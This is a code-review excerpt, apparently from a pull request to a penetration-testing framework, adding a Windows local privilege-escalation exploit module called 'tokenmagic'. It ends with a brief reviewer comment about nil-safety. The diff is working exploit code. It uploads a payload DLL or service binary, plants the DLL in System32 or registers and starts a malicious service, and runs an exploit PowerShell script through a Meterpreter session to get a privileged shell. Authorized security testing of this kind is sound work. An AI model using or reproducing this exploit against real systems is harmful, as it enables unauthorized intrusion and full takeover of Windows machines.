modules/exploits/windows/local/tokenmagic.rb

```diff
@@ -0,0 +1,228 @@
+      writable_dir = datastore['WRITABLE_DIR']
+    end
+
+    if datastore['METHOD'] =~ /DLL/i
+      bin_path = "#{writable_dir}\\WindowsCoreDeviceInfo.dll"
+      payload = generate_payload_dll
+      print_status("Payload DLL is #{payload.length} bytes long")
+      client.core.use('powershell') if !client.ext.aliases.include?('powershell')
+      register_file_for_cleanup('C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up.
+      # Replace Value in Generic Script.
+      cmd_args = "/c move #{bin_path} C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll"
+    else
+      bin_path = "#{writable_dir}\\#{service_filename}"
+      payload = generate_payload_exe_service({ servicename: service_name, arch: payload_arch })
+      vprint_status("Service Name = #{service_name}")
+      client.core.use('powershell') if !client.ext.aliases.include?('powershell')
+      # Replace Value in Generic Script. Note Windows 7 requires spaces after the equal signs in the below command.
+      cmd_args = "/c sc create #{service_name} binPath= #{bin_path} type= own start= demand && sc start #{service_name}"
+    end
+
+    # Check target
+    vprint_status('Checking Target')
+    validate_active_host
+    validate_payload
+
+    # Upload the payload
+    print_status("Uploading payload to #{bin_path}")
+    write_file(bin_path, payload)
+    register_file_for_cleanup(bin_path)
+
+    # Read in Generic Script
+    script = exploit_data('tokenmagic', 'tokenmagic.ps1')
+    fail_with(Failure::BadConfig, 'No exploit script found') if script.nil?
+    script.gsub!('_CMD_PATH_', cmd_path)
+    script.gsub!('_CMD_ARGS_', cmd_args)
+
+    # Run Exploit Script
+    print_status("Running Exploit on #{sysinfo['Computer']}")
+    begin
+      print_status('Executing ')
+      session.powershell.execute_string({ code: script })
+    rescue Rex::TimeoutError => e
+      elog('Caught timeout.  Exploit may be taking longer or it may have failed.', error: e)
+      print_error('Caught timeout.  Exploit may be taking longer or it may have failed.')
+    end
+
+    launch_dll_trigger if datastore['METHOD'] =~ /DLL/i
+    print_status('Enjoy the shell!')
+  end
+
+  def validate_active_host
+    begin
+      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog('Could not connect to session', error: e)
+      raise Msf::Exploit::Failed, 'Could not connect to session'
+    end
+  end
+
+  def validate_payload
+    vprint_status("Target Arch = #{sysinfo['Architecture']}")
+    vprint_status("Payload Arch = #{payload.arch.first}")
+    unless payload.arch.first == sysinfo['Architecture']
+      fail_with(Failure::BadConfig, 'Payload arch must match target arch')
+    end
+  end
+
+  def check
+    sysinfo_value = sysinfo['OS']
+    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
```

Comment:
This is not `nil`-safe.

Reply:
Good call, I've added a check for `build_num` before it gets used